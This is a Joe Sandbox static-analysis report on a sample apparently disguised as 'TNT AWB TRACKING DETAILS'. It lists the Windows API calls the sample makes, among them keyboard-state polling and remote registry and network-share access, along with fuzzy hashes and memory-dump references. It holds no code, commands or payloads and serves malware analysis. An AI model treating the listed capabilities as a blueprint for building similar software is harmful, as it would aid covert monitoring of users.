                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                      • String ID:
                                      • API String ID: 2170234536-0
                                      • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                      • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                      • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                      • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00453CE0
                                      • SetKeyboardState.USER32(?), ref: 00453D3B
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                      • GetKeyState.USER32(000000A0), ref: 00453D75
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                      • GetKeyState.USER32(000000A1), ref: 00453DB5
                                      • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                      • GetKeyState.USER32(00000011), ref: 00453DEF
                                      • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                      • GetKeyState.USER32(00000012), ref: 00453E26
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                      • GetKeyState.USER32(0000005B), ref: 00453E5D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                      • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                      • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                      • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                      • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                      • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                      • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                      • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                      • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                      • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                      • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                      • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                      • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                      • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                      • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                      • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                      APIs
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                      • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                      • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                      • DeleteObject.GDI32(?), ref: 0047151E
                                      • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                      • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                      • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                      • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                      • DeleteObject.GDI32(?), ref: 004715EA
                                      • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                      • String ID:
                                      • API String ID: 3218148540-0
                                      • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                      • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                      • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                      • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                      • String ID:
                                      • API String ID: 136442275-0
                                      • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                      • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                      • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                      • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                      APIs
                                      • _wcsncpy.LIBCMT ref: 00467490
                                      • _wcsncpy.LIBCMT ref: 004674BC
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • _wcstok.LIBCMT ref: 004674FF
                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                      • _wcstok.LIBCMT ref: 004675B2
                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                      • _wcslen.LIBCMT ref: 00467793
                                      • _wcscpy.LIBCMT ref: 00467641
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • _wcslen.LIBCMT ref: 004677BD
                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                      • String ID: X
                                      • API String ID: 3104067586-3081909835
                                      • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                      • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                      • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                      • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                      • _wcslen.LIBCMT ref: 004610A3
                                      • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                      • GetWindowRect.USER32(?,?), ref: 00461248
                                        • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                      • String ID: ThumbnailClass
                                      • API String ID: 4136854206-1241985126
                                      • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                      • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                      • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                      • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                      APIs
                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                      • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                      • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                      • GetClientRect.USER32(?,?), ref: 00471A1A
                                      • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                      • String ID: 2
                                      • API String ID: 1331449709-450215437
                                      • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                      • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                      • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                      • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                      • __swprintf.LIBCMT ref: 00460915
                                      • __swprintf.LIBCMT ref: 0046092D
                                      • _wprintf.LIBCMT ref: 004609E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                      • API String ID: 3054410614-2561132961
                                      • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                      • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                      • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                      • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                      • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                      • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                      • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                      • API String ID: 600699880-22481851
                                      • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                      • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                      • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                      • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: DestroyWindow
                                      • String ID: static
                                      • API String ID: 3375834691-2160076837
                                      • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                      • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                      • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                      • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                      • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                      • API String ID: 2907320926-3566645568
                                      • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                      • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                      • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                      • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                      APIs
                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                      • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                      • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                      • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                      • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                      • DeleteObject.GDI32(00700000), ref: 00470A04
                                      • DestroyIcon.USER32(00550000), ref: 00470A1C
                                      • DeleteObject.GDI32(EE5453E2), ref: 00470A34
                                      • DestroyWindow.USER32(005C0061), ref: 00470A4C
                                      • DestroyIcon.USER32(?), ref: 00470A73
                                      • DestroyIcon.USER32(?), ref: 00470A81
                                      • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 1237572874-0
                                      • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                      • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                      • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                      • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                      • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                      • VariantInit.OLEAUT32(?), ref: 004793E1
                                      • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                      • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                      • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                      • VariantClear.OLEAUT32(?), ref: 00479489
                                      • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                      • VariantClear.OLEAUT32(?), ref: 004794CA
                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
